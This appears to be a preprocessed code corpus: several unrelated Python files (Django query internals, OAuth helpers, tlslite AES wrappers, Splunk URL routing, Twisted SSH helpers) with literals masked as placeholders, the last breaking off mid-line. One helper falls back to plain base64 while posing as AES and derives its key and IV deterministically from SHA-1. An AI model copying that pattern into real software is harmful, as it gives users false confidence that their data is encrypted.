<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import datetime <EOL> from itertools import repeat <EOL> from django . utils import tree <EOL> from django . db . models . fields import Field <EOL> from django . db . models . sql . datastructures import EmptyResultSet <EOL> from django . db . models . sql . aggregates import Aggregate <EOL> from django . utils . itercompat import is_iterator <EOL> from django . utils . six . moves import xrange <EOL> AND = '<STR_LIT>' <EOL> OR = '<STR_LIT>' <EOL> class EmptyShortCircuit ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class WhereNode ( tree . Node ) : <EOL> """<STR_LIT>""" <EOL> default = AND <EOL> def add ( self , data , connector ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( data , ( list , tuple ) ) : <EOL> super ( WhereNode , self ) . add ( data , connector ) <EOL> return <EOL> obj , lookup_type , value = data <EOL> if is_iterator ( value ) : <EOL> value = list ( value ) <EOL> if isinstance ( value , datetime . datetime ) : <EOL> value_annotation = datetime . datetime <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> value_annotation = value . value_annotation <EOL> else : <EOL> value_annotation = bool ( value ) <EOL> if hasattr ( obj , "<STR_LIT>" ) : <EOL> value = obj . prepare ( lookup_type , value ) <EOL> super ( WhereNode , self ) . add ( <EOL> ( obj , lookup_type , value_annotation , value ) , connector ) <EOL> def as_sql ( self , qn , connection ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> result_params = [ ] <EOL> everything_childs , nothing_childs = <NUM_LIT:0> , <NUM_LIT:0> <EOL> non_empty_childs = len ( self . children ) <EOL> for child in self . children : <EOL> try : <EOL> if hasattr ( child , '<STR_LIT>' ) : <EOL> sql , params = child . as_sql ( qn = qn , connection = connection ) <EOL> else : <EOL> sql , params = self . 
make_atom ( child , qn , connection ) <EOL> except EmptyResultSet : <EOL> nothing_childs += <NUM_LIT:1> <EOL> else : <EOL> if sql : <EOL> result . append ( sql ) <EOL> result_params . extend ( params ) <EOL> else : <EOL> if sql is None : <EOL> non_empty_childs -= <NUM_LIT:1> <EOL> continue <EOL> everything_childs += <NUM_LIT:1> <EOL> if self . connector == AND : <EOL> full_needed , empty_needed = non_empty_childs , <NUM_LIT:1> <EOL> else : <EOL> full_needed , empty_needed = <NUM_LIT:1> , non_empty_childs <EOL> if empty_needed - nothing_childs <= <NUM_LIT:0> : <EOL> if self . negated : <EOL> return '<STR_LIT>' , [ ] <EOL> else : <EOL> raise EmptyResultSet <EOL> if full_needed - everything_childs <= <NUM_LIT:0> : <EOL> if self . negated : <EOL> raise EmptyResultSet <EOL> else : <EOL> return '<STR_LIT>' , [ ] <EOL> if non_empty_childs == <NUM_LIT:0> : <EOL> return None , [ ] <EOL> conn = '<STR_LIT>' % self . connector <EOL> sql_string = conn . join ( result ) <EOL> if sql_string : <EOL> if self . negated : <EOL> sql_string = '<STR_LIT>' % sql_string <EOL> elif len ( result ) > <NUM_LIT:1> : <EOL> sql_string = '<STR_LIT>' % sql_string <EOL> return sql_string , result_params <EOL> def make_atom ( self , child , qn , connection ) : <EOL> """<STR_LIT>""" <EOL> lvalue , lookup_type , value_annotation , params_or_value = child <EOL> if isinstance ( lvalue , Constraint ) : <EOL> try : <EOL> lvalue , params = lvalue . process ( lookup_type , params_or_value , connection ) <EOL> except EmptyShortCircuit : <EOL> raise EmptyResultSet <EOL> elif isinstance ( lvalue , Aggregate ) : <EOL> params = lvalue . field . get_db_prep_lookup ( lookup_type , params_or_value , connection ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if isinstance ( lvalue , tuple ) : <EOL> field_sql = self . sql_for_columns ( lvalue , qn , connection ) <EOL> else : <EOL> field_sql = lvalue . as_sql ( qn , connection ) <EOL> if value_annotation is datetime . 
datetime : <EOL> cast_sql = connection . ops . datetime_cast_sql ( ) <EOL> else : <EOL> cast_sql = '<STR_LIT:%s>' <EOL> if hasattr ( params , '<STR_LIT>' ) : <EOL> extra , params = params . as_sql ( qn , connection ) <EOL> cast_sql = '<STR_LIT>' <EOL> else : <EOL> extra = '<STR_LIT>' <EOL> if ( len ( params ) == <NUM_LIT:1> and params [ <NUM_LIT:0> ] == '<STR_LIT>' and lookup_type == '<STR_LIT>' <EOL> and connection . features . interprets_empty_strings_as_nulls ) : <EOL> lookup_type = '<STR_LIT>' <EOL> value_annotation = True <EOL> if lookup_type in connection . operators : <EOL> format = "<STR_LIT>" % ( connection . ops . lookup_cast ( lookup_type ) , ) <EOL> return ( format % ( field_sql , <EOL> connection . operators [ lookup_type ] % cast_sql , <EOL> extra ) , params ) <EOL> if lookup_type == '<STR_LIT>' : <EOL> if not value_annotation : <EOL> raise EmptyResultSet <EOL> if extra : <EOL> return ( '<STR_LIT>' % ( field_sql , extra ) , params ) <EOL> max_in_list_size = connection . ops . max_in_list_size ( ) <EOL> if max_in_list_size and len ( params ) > max_in_list_size : <EOL> in_clause_elements = [ '<STR_LIT:(>' ] <EOL> for offset in xrange ( <NUM_LIT:0> , len ( params ) , max_in_list_size ) : <EOL> if offset > <NUM_LIT:0> : <EOL> in_clause_elements . append ( '<STR_LIT>' ) <EOL> in_clause_elements . append ( '<STR_LIT>' % field_sql ) <EOL> group_size = min ( len ( params ) - offset , max_in_list_size ) <EOL> param_group = '<STR_LIT:U+002CU+0020>' . join ( repeat ( '<STR_LIT:%s>' , group_size ) ) <EOL> in_clause_elements . append ( param_group ) <EOL> in_clause_elements . append ( '<STR_LIT:)>' ) <EOL> in_clause_elements . append ( '<STR_LIT:)>' ) <EOL> return '<STR_LIT>' . join ( in_clause_elements ) , params <EOL> else : <EOL> return ( '<STR_LIT>' % ( field_sql , <EOL> '<STR_LIT:U+002CU+0020>' . 
join ( repeat ( '<STR_LIT:%s>' , len ( params ) ) ) ) , <EOL> params ) <EOL> elif lookup_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return ( '<STR_LIT>' % field_sql , params ) <EOL> elif lookup_type in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return ( '<STR_LIT>' % connection . ops . date_extract_sql ( lookup_type , field_sql ) , <EOL> params ) <EOL> elif lookup_type == '<STR_LIT>' : <EOL> return ( '<STR_LIT>' % ( field_sql , <EOL> ( not value_annotation and '<STR_LIT>' or '<STR_LIT>' ) ) , ( ) ) <EOL> elif lookup_type == '<STR_LIT>' : <EOL> return ( connection . ops . fulltext_search_sql ( field_sql ) , params ) <EOL> elif lookup_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return connection . ops . regex_lookup ( lookup_type ) % ( field_sql , cast_sql ) , params <EOL> raise TypeError ( '<STR_LIT>' % lookup_type ) <EOL> def sql_for_columns ( self , data , qn , connection ) : <EOL> """<STR_LIT>""" <EOL> table_alias , name , db_type = data <EOL> if table_alias : <EOL> lhs = '<STR_LIT>' % ( qn ( table_alias ) , qn ( name ) ) <EOL> else : <EOL> lhs = qn ( name ) <EOL> return connection . ops . field_cast_sql ( db_type ) % lhs <EOL> def relabel_aliases ( self , change_map , node = None ) : <EOL> """<STR_LIT>""" <EOL> if not node : <EOL> node = self <EOL> for pos , child in enumerate ( node . children ) : <EOL> if hasattr ( child , '<STR_LIT>' ) : <EOL> child . relabel_aliases ( change_map ) <EOL> elif isinstance ( child , tree . Node ) : <EOL> self . relabel_aliases ( change_map , child ) <EOL> elif isinstance ( child , ( list , tuple ) ) : <EOL> if isinstance ( child [ <NUM_LIT:0> ] , ( list , tuple ) ) : <EOL> elt = list ( child [ <NUM_LIT:0> ] ) <EOL> if elt [ <NUM_LIT:0> ] in change_map : <EOL> elt [ <NUM_LIT:0> ] = change_map [ elt [ <NUM_LIT:0> ] ] <EOL> node . children [ pos ] = ( tuple ( elt ) , ) + child [ <NUM_LIT:1> : ] <EOL> else : <EOL> child [ <NUM_LIT:0> ] . 
relabel_aliases ( change_map ) <EOL> if hasattr ( child [ <NUM_LIT:3> ] , '<STR_LIT>' ) : <EOL> child [ <NUM_LIT:3> ] . relabel_aliases ( change_map ) <EOL> class EverythingNode ( object ) : <EOL> """<STR_LIT>""" <EOL> def as_sql ( self , qn = None , connection = None ) : <EOL> return '<STR_LIT>' , [ ] <EOL> def relabel_aliases ( self , change_map , node = None ) : <EOL> return <EOL> class NothingNode ( object ) : <EOL> """<STR_LIT>""" <EOL> def as_sql ( self , qn = None , connection = None ) : <EOL> raise EmptyResultSet <EOL> def relabel_aliases ( self , change_map , node = None ) : <EOL> return <EOL> class ExtraWhere ( object ) : <EOL> def __init__ ( self , sqls , params ) : <EOL> self . sqls = sqls <EOL> self . params = params <EOL> def as_sql ( self , qn = None , connection = None ) : <EOL> sqls = [ "<STR_LIT>" % sql for sql in self . sqls ] <EOL> return "<STR_LIT>" . join ( sqls ) , tuple ( self . params or ( ) ) <EOL> class Constraint ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , alias , col , field ) : <EOL> self . alias , self . col , self . field = alias , col , field <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> obj_dict = self . __dict__ . copy ( ) <EOL> if self . field : <EOL> obj_dict [ '<STR_LIT>' ] = self . field . model <EOL> obj_dict [ '<STR_LIT>' ] = self . field . name <EOL> del obj_dict [ '<STR_LIT>' ] <EOL> return obj_dict <EOL> def __setstate__ ( self , data ) : <EOL> """<STR_LIT>""" <EOL> model = data . pop ( '<STR_LIT>' , None ) <EOL> field_name = data . pop ( '<STR_LIT>' , None ) <EOL> self . __dict__ . update ( data ) <EOL> if model is not None : <EOL> self . field = model . _meta . get_field ( field_name ) <EOL> else : <EOL> self . field = None <EOL> def prepare ( self , lookup_type , value ) : <EOL> if self . field : <EOL> return self . field . 
get_prep_lookup ( lookup_type , value ) <EOL> return value <EOL> def process ( self , lookup_type , value , connection ) : <EOL> """<STR_LIT>""" <EOL> from django . db . models . base import ObjectDoesNotExist <EOL> try : <EOL> if self . field : <EOL> params = self . field . get_db_prep_lookup ( lookup_type , value , <EOL> connection = connection , prepared = True ) <EOL> db_type = self . field . db_type ( connection = connection ) <EOL> else : <EOL> params = Field ( ) . get_db_prep_lookup ( lookup_type , value , <EOL> connection = connection , prepared = True ) <EOL> db_type = None <EOL> except ObjectDoesNotExist : <EOL> raise EmptyShortCircuit <EOL> return ( self . alias , self . col , db_type ) , params <EOL> def relabel_aliases ( self , change_map ) : <EOL> if self . alias in change_map : <EOL> self . alias = change_map [ self . alias ] </s>
<s> from . mbcharsetprober import MultiByteCharSetProber <EOL> from . codingstatemachine import CodingStateMachine <EOL> from . chardistribution import Big5DistributionAnalysis <EOL> from . mbcssm import Big5SMModel <EOL> class Big5Prober ( MultiByteCharSetProber ) : <EOL> def __init__ ( self ) : <EOL> MultiByteCharSetProber . __init__ ( self ) <EOL> self . _mCodingSM = CodingStateMachine ( Big5SMModel ) <EOL> self . _mDistributionAnalyzer = Big5DistributionAnalysis ( ) <EOL> self . reset ( ) <EOL> def get_charset_name ( self ) : <EOL> return "<STR_LIT>" </s>
from __future__ import absolute_import
"""Utility helpers for OAuth request handling: percent-encoding, unicode
parameter normalisation, nonce/token generation, and a simple Request
container.  Python 2 only (uses unicode/basestring and urllib/urlparse)."""
import random
import re
import string
import time
import urllib
import urlparse

# ASCII letters+digits as unicode; default alphabet for generate_token().
UNICODE_ASCII_CHARACTER_SET = ( string . ascii_letters . decode ( '<STR_LIT:ascii>' ) +
    string . digits . decode ( '<STR_LIT:ascii>' ) )

# Characters that never need percent-encoding (masked literals; upstream
# this is the RFC 3986 unreserved set — confirm).
always_safe = ( u'<STR_LIT>'
    u'<STR_LIT>'
    u'<STR_LIT>' u'<STR_LIT>' )


def quote ( s , safe = u'<STR_LIT:/>' ) :
    """Percent-encode a unicode string, round-tripping through UTF-8."""
    encoded = s . encode ( "<STR_LIT:utf-8>" )
    quoted = urllib . quote ( encoded , safe )
    return quoted . decode ( "<STR_LIT:utf-8>" )


def unquote ( s ) :
    """Inverse of quote(): percent-decode a unicode string via UTF-8."""
    encoded = s . encode ( "<STR_LIT:utf-8>" )
    unquoted = urllib . unquote ( encoded )
    return unquoted . decode ( "<STR_LIT:utf-8>" )


def urlencode ( params ) :
    """urlencode a sequence of pairs, accepting unicode keys/values."""
    utf8_params = encode_params_utf8 ( params )
    urlencoded = urllib . urlencode ( utf8_params )
    return urlencoded . decode ( "<STR_LIT:utf-8>" )


def encode_params_utf8 ( params ) :
    """Return a copy of the (key, value) pairs with unicode members encoded
    to UTF-8 bytestrings; non-unicode members pass through unchanged."""
    encoded = [ ]
    for k , v in params :
        encoded . append ( (
            k . encode ( '<STR_LIT:utf-8>' ) if isinstance ( k , unicode ) else k ,
            v . encode ( '<STR_LIT:utf-8>' ) if isinstance ( v , unicode ) else v ) )
    return encoded


def decode_params_utf8 ( params ) :
    """Return a copy of the (key, value) pairs with bytestring members
    decoded from UTF-8 to unicode; other members pass through unchanged."""
    decoded = [ ]
    for k , v in params :
        decoded . append ( (
            k . decode ( '<STR_LIT:utf-8>' ) if isinstance ( k , str ) else k ,
            v . decode ( '<STR_LIT:utf-8>' ) if isinstance ( v , str ) else v ) )
    return decoded


# Full set of characters legal in an already-urlencoded string.
urlencoded = set ( always_safe ) | set ( u'<STR_LIT>' )


def urldecode ( query ) :
    """Strictly parse a urlencoded query string into unicode pairs.

    Raises ValueError on characters outside the urlencoded set or on
    malformed percent-escapes, rather than silently accepting them.
    """
    if query and not set ( query ) <= urlencoded :
        raise ValueError ( '<STR_LIT>' )
    # Regex matching invalid %-escapes (masked literal — confirm pattern).
    invalid_hex = u'<STR_LIT>'
    if len ( re . findall ( invalid_hex , query ) ) :
        raise ValueError ( '<STR_LIT>' )
    query = query . decode ( '<STR_LIT:utf-8>' ) if isinstance ( query , str ) else query
    params = urlparse . parse_qsl ( query , keep_blank_values = True )
    return decode_params_utf8 ( params )


def extract_params ( raw ) :
    """Best-effort extraction of a list of unicode (key, value) pairs from a
    query string, a dict, or any iterable of pairs.  Returns None when the
    input cannot be interpreted as parameters."""
    if isinstance ( raw , basestring ) :
        try :
            params = urldecode ( raw )
        except ValueError :
            params = None
    elif hasattr ( raw , '<STR_LIT>' ) :
        try :
            # Probe convertibility only; the result is rebuilt below so
            # ordering of non-dict pair sequences is preserved.
            dict ( raw )
        except ValueError :
            params = None
        except TypeError :
            params = None
        else :
            params = list ( raw . items ( ) if isinstance ( raw , dict ) else raw )
            params = decode_params_utf8 ( params )
    else :
        params = None
    return params


def generate_nonce ( ) :
    """Return a unique unicode nonce: 64 random bits + current timestamp."""
    return unicode ( unicode ( random . getrandbits ( <NUM_LIT:64> ) ) + generate_timestamp ( ) )


def generate_timestamp ( ) :
    """Return the current POSIX time as a unicode integer string."""
    return unicode ( int ( time . time ( ) ) )


def generate_token ( length = <NUM_LIT:30> , chars = UNICODE_ASCII_CHARACTER_SET ) :
    """Return a random token drawn from *chars* using SystemRandom
    (cryptographically seeded)."""
    rand = random . SystemRandom ( )
    return u'<STR_LIT>' . join ( rand . choice ( chars ) for x in range ( length ) )


def add_params_to_qs ( query , params ) :
    """Append extra (key, value) pairs to an existing query string."""
    queryparams = urlparse . parse_qsl ( query , keep_blank_values = True )
    queryparams . extend ( params )
    return urlencode ( queryparams )


def add_params_to_uri ( uri , params ) :
    """Append extra query parameters to a full URI, leaving the other URI
    components untouched."""
    sch , net , path , par , query , fra = urlparse . urlparse ( uri )
    query = add_params_to_qs ( query , params )
    return urlparse . urlunparse ( ( sch , net , path , par , query , fra ) )


def safe_string_equals ( a , b ) :
    """Constant-time-ish string comparison to resist timing attacks.

    NOTE(review): the early length check still leaks length — acceptable
    for signature comparison where lengths are public; confirm.
    """
    if len ( a ) != len ( b ) :
        return False
    result = <NUM_LIT:0>
    for x , y in zip ( a , b ) :
        result |= ord ( x ) ^ ord ( y )
    return result == <NUM_LIT:0>


class Request ( object ) :
    """A lightweight container for an HTTP request being signed/verified:
    uri, method, headers, raw body, and the body decoded into pairs."""
    def __init__ ( self , uri , http_method = u'<STR_LIT:GET>' , body = None , headers = None ) :
        self . uri = uri
        self . http_method = http_method
        self . headers = headers or { }
        self . body = body
        # None when the body is not parameter-like (see extract_params).
        self . decoded_body = extract_params ( body )
        self . oauth_params = [ ]

    @ property
    def uri_query ( self ) :
        # Just the query component of the URI.
        return urlparse . urlparse ( self . uri ) . query

    @ property
    def uri_query_params ( self ) :
        # Strictly parsed query pairs; raises on malformed queries.
        return urlparse . parse_qsl ( self . uri_query , keep_blank_values = True ,
            strict_parsing = True )
<s> """<STR_LIT>""" <EOL> import anydbm <EOL> import thread <EOL> class BaseDB : <EOL> def __init__ ( self , filename , type ) : <EOL> self . type = type <EOL> self . filename = filename <EOL> if self . filename : <EOL> self . db = None <EOL> else : <EOL> self . db = { } <EOL> self . lock = thread . allocate_lock ( ) <EOL> def create ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . filename : <EOL> self . db = anydbm . open ( self . filename , "<STR_LIT:n>" ) <EOL> self . db [ "<STR_LIT>" ] = self . type <EOL> self . db . sync ( ) <EOL> else : <EOL> self . db = { } <EOL> def open ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . filename : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . db = anydbm . open ( self . filename , "<STR_LIT:w>" ) <EOL> try : <EOL> if self . db [ "<STR_LIT>" ] != self . type : <EOL> raise ValueError ( "<STR_LIT>" % self . type ) <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def __getitem__ ( self , username ) : <EOL> if self . db == None : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> self . lock . acquire ( ) <EOL> try : <EOL> valueStr = self . db [ username ] <EOL> finally : <EOL> self . lock . release ( ) <EOL> return self . _getItem ( username , valueStr ) <EOL> def __setitem__ ( self , username , value ) : <EOL> if self . db == None : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> valueStr = self . _setItem ( username , value ) <EOL> self . lock . acquire ( ) <EOL> try : <EOL> self . db [ username ] = valueStr <EOL> if self . filename : <EOL> self . db . sync ( ) <EOL> finally : <EOL> self . lock . release ( ) <EOL> def __delitem__ ( self , username ) : <EOL> if self . db == None : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> self . lock . acquire ( ) <EOL> try : <EOL> del ( self . db [ username ] ) <EOL> if self . filename : <EOL> self . db . sync ( ) <EOL> finally : <EOL> self . lock . release ( ) <EOL> def __contains__ ( self , username ) : <EOL> """<STR_LIT>""" <EOL> if self . 
db == None : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> self . lock . acquire ( ) <EOL> try : <EOL> return self . db . has_key ( username ) <EOL> finally : <EOL> self . lock . release ( ) <EOL> def check ( self , username , param ) : <EOL> value = self . __getitem__ ( username ) <EOL> return self . _checkItem ( value , username , param ) <EOL> def keys ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . db == None : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> self . lock . acquire ( ) <EOL> try : <EOL> usernames = self . db . keys ( ) <EOL> finally : <EOL> self . lock . release ( ) <EOL> usernames = [ u for u in usernames if not u . startswith ( "<STR_LIT>" ) ] <EOL> return usernames </s>
<s> """<STR_LIT>""" <EOL> from . cryptomath import * <EOL> from . aes import * <EOL> if m2cryptoLoaded : <EOL> def new ( key , mode , IV ) : <EOL> return OpenSSL_AES ( key , mode , IV ) <EOL> class OpenSSL_AES ( AES ) : <EOL> def __init__ ( self , key , mode , IV ) : <EOL> AES . __init__ ( self , key , mode , IV , "<STR_LIT>" ) <EOL> self . key = key <EOL> self . IV = IV <EOL> def _createContext ( self , encrypt ) : <EOL> context = m2 . cipher_ctx_new ( ) <EOL> if len ( self . key ) == <NUM_LIT:16> : <EOL> cipherType = m2 . aes_128_cbc ( ) <EOL> if len ( self . key ) == <NUM_LIT> : <EOL> cipherType = m2 . aes_192_cbc ( ) <EOL> if len ( self . key ) == <NUM_LIT:32> : <EOL> cipherType = m2 . aes_256_cbc ( ) <EOL> m2 . cipher_init ( context , cipherType , self . key , self . IV , encrypt ) <EOL> return context <EOL> def encrypt ( self , plaintext ) : <EOL> AES . encrypt ( self , plaintext ) <EOL> context = self . _createContext ( <NUM_LIT:1> ) <EOL> ciphertext = m2 . cipher_update ( context , plaintext ) <EOL> m2 . cipher_ctx_free ( context ) <EOL> self . IV = ciphertext [ - self . block_size : ] <EOL> return ciphertext <EOL> def decrypt ( self , ciphertext ) : <EOL> AES . decrypt ( self , ciphertext ) <EOL> context = self . _createContext ( <NUM_LIT:0> ) <EOL> plaintext = m2 . cipher_update ( context , ciphertext + ( '<STR_LIT>' * <NUM_LIT:16> ) ) <EOL> plaintext = plaintext [ : len ( ciphertext ) ] <EOL> m2 . cipher_ctx_free ( context ) <EOL> self . IV = ciphertext [ - self . block_size : ] <EOL> return plaintext </s>
<s> import hashlib <EOL> import base64 <EOL> try : <EOL> from tlslite . utils import cipherfactory <EOL> use_aes = True <EOL> except : <EOL> use_aes = False <EOL> BLOCK_SIZE = <NUM_LIT:16> <EOL> class _SimplerAES ( object ) : <EOL> def __init__ ( self , key ) : <EOL> self . _rawkey = key <EOL> def pad ( self , data ) : <EOL> pad = BLOCK_SIZE - len ( data ) % BLOCK_SIZE <EOL> return data + pad * chr ( pad ) <EOL> def unpad ( self , padded ) : <EOL> pad = ord ( padded [ - <NUM_LIT:1> ] ) <EOL> return padded [ : - pad ] <EOL> def encrypt ( self , data ) : <EOL> password = self . _rawkey <EOL> m = hashlib . sha1 ( ) <EOL> m . update ( password ) <EOL> key = m . hexdigest ( ) [ : <NUM_LIT:32> ] <EOL> m = hashlib . sha1 ( ) <EOL> m . update ( password + key ) <EOL> iv = m . hexdigest ( ) <EOL> data = self . pad ( data ) <EOL> aes = cipherfactory . createAES ( key , iv [ : <NUM_LIT:16> ] ) <EOL> encrypted = str ( aes . encrypt ( data ) ) <EOL> return base64 . urlsafe_b64encode ( encrypted ) <EOL> def decrypt ( self , edata ) : <EOL> password = self . _rawkey <EOL> edata = base64 . urlsafe_b64decode ( str ( edata ) ) <EOL> m = hashlib . sha1 ( ) <EOL> m . update ( password ) <EOL> key = m . hexdigest ( ) [ : <NUM_LIT:32> ] <EOL> m = hashlib . sha1 ( ) <EOL> m . update ( password + key ) <EOL> iv = m . hexdigest ( ) <EOL> aes = cipherfactory . createAES ( key , iv [ : <NUM_LIT:16> ] ) <EOL> return self . unpad ( str ( aes . decrypt ( edata ) ) ) <EOL> class NoAES ( object ) : <EOL> def __init__ ( self , key ) : <EOL> pass <EOL> def pad ( self , data ) : <EOL> pass <EOL> def unpad ( self , padded ) : <EOL> pass <EOL> def encrypt ( self , data ) : <EOL> return base64 . urlsafe_b64encode ( "<STR_LIT>" % ( "<STR_LIT>" , data ) ) <EOL> def decrypt ( self , edata ) : <EOL> edata = base64 . urlsafe_b64decode ( edata ) <EOL> return str ( edata ) [ len ( "<STR_LIT>" ) : ] <EOL> SimplerAES = _SimplerAES if use_aes else NoAES <EOL> __all__ = [ '<STR_LIT>' ] </s>
<s> from django . contrib . staticfiles . urls import staticfiles_urlpatterns <EOL> from django . conf . urls import patterns , include , url <EOL> from django . core . urlresolvers import reverse , RegexURLPattern <EOL> from django . conf import settings <EOL> from django . conf . urls . i18n import i18n_patterns <EOL> from django . utils import importlib <EOL> import sys <EOL> from django . http import HttpResponseRedirect <EOL> import logging <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> def redirect_to_default_app ( request ) : <EOL> home = "<STR_LIT>" % settings . DEFAULT_APP <EOL> reversed = "<STR_LIT>" % settings . DEFAULT_APP <EOL> try : <EOL> reversed = reverse ( home ) <EOL> except Exception , e : <EOL> logger . exception ( e ) <EOL> pass <EOL> return HttpResponseRedirect ( reversed ) <EOL> def redirect_to_home ( app ) : <EOL> def redirect_internal ( request ) : <EOL> home = "<STR_LIT>" % app <EOL> reversed = "<STR_LIT>" % app <EOL> try : <EOL> reversed = reverse ( home ) <EOL> except Exception , e : <EOL> logger . exception ( e ) <EOL> pass <EOL> return HttpResponseRedirect ( reversed ) <EOL> return redirect_internal <EOL> handler404 = '<STR_LIT>' <EOL> handler500 = '<STR_LIT>' <EOL> urlpatterns = i18n_patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , redirect_to_default_app , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> ) <EOL> for app in settings . USER_APPS : <EOL> app_prefix = r'<STR_LIT>' % app <EOL> urls = None <EOL> try : <EOL> app_urls_module = "<STR_LIT>" % app <EOL> app_urls = importlib . import_module ( app_urls_module ) <EOL> urls = app_urls . urlpatterns <EOL> except Exception , e : <EOL> app_module = importlib . 
import_module ( app ) <EOL> if hasattr ( app_module , '<STR_LIT>' ) : <EOL> urls = app_module . urlpatterns <EOL> else : <EOL> logger . debug ( "<STR_LIT>" % app ) <EOL> logger . exception ( e ) ; <EOL> if urls : <EOL> has_home = len ( filter ( lambda url : url . name is '<STR_LIT>' , urls ) ) <EOL> if not has_home : <EOL> first_url = urls [ <NUM_LIT:0> ] <EOL> home_url = RegexURLPattern ( <EOL> first_url . regex . pattern , <EOL> first_url . callback , <EOL> first_url . default_args , <EOL> '<STR_LIT>' <EOL> ) <EOL> urls . insert ( <NUM_LIT:0> , home_url ) <EOL> urls . append ( url ( r'<STR_LIT>' , redirect_to_home ( app ) ) ) <EOL> urls += ( <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> ) <EOL> urlpatterns += i18n_patterns ( '<STR_LIT>' , <EOL> ( app_prefix , include ( urls , namespace = app , app_name = app ) ) <EOL> ) <EOL> from splunkdj . utility import jsurls , config <EOL> jsurls . create_javascript_urlpatterns ( ) <EOL> config . create_config ( ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . GenericIPAddressField ( null = True , blank = True ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( max_length = <NUM_LIT> , blank = True ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( max_length = <NUM_LIT> , blank = True ) , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from twisted . internet import defer <EOL> from twisted . conch . ssh import common <EOL> from twisted . conch . ssh . channel import SSHChannel <EOL> from twisted . internet . protocol import connectionDone <EOL> from twisted . conch . ssh . session import packRequest_pty_req <EOL> def connectExec ( connection , protocol , commandLine ) : <EOL> """<STR_LIT>""" <EOL> deferred = connectSession ( connection , protocol ) <EOL> @ deferred . addCallback <EOL> def requestSubsystem ( session ) : <EOL> return session . requestExec ( commandLine ) <EOL> return deferred <EOL> def connectShell ( connection , protocol ) : <EOL> """<STR_LIT>""" <EOL> deferred = connectSession ( connection , protocol ) <EOL> @ deferred . addCallback <EOL> def requestSubsystem ( session ) : <EOL> return session . requestShell ( ) <EOL> return deferred <EOL> def connectSubsystem ( connection , protocol , subsystem ) : <EOL> """<STR_LIT>""" <EOL> deferred = connectSession ( connection , protocol ) <EOL> @ deferred . addCallback <EOL> def requestSubsystem ( session ) : <EOL> return session . requestSubsystem ( subsystem ) <EOL> return deferred <EOL> def connectSession ( connection , protocol , sessionFactory = None , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> factory = sessionFactory or defaultSessionFactory <EOL> session = factory ( * args , ** kwargs ) <EOL> session . dataReceived = protocol . dataReceived <EOL> session . closed = lambda : protocol . connectionLost ( connectionDone ) <EOL> deferred = defer . Deferred ( ) <EOL> @ deferred . addCallback <EOL> def connectProtocolAndReturnSession ( specificData ) : <EOL> protocol . makeConnection ( session ) <EOL> return session <EOL> session . sessionOpen = deferred . callback <EOL> session . openFailed = deferred . errback <EOL> connection . 
